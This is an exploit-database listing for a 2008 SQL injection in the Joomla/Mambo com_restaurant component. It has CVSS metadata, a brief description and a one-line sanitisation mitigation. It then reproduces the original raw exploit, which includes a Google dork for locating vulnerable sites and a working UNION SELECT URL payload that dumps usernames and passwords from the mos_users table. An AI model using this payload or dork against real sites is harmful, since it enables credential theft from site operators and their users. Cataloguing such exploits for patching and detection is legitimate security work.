header-logo
Suggest Exploit
vendor:
Restaurant
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Restaurant
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:1100cc:restaurant
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_restaurant)

An attacker can exploit a SQL injection vulnerability in the com_restaurant component of Joomla! by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the back-end database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_restaurant)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_restaurant"
#
########################################################################
EXPLOIT :

index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


#########################################################################
# S@BUN                  www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                     GOOD LUCKY                               S@BUN
#########################################################################

  <name>Restaurant</name>
  <creationDate>02-05-2005</creationDate>
  <author>1100cc</author>
  <copyright>This component is released under the GNU/GPL License</copyright>
  <authorEmail>webmaster@1100cc.nl</authorEmail>

  <authorUrl>www.1100cc.nl</authorUrl>
  <version>1.0</version>
  <description>Restaurant is a fully integrated Mambo component.</description>

# milw0rm.com [2008-01-31]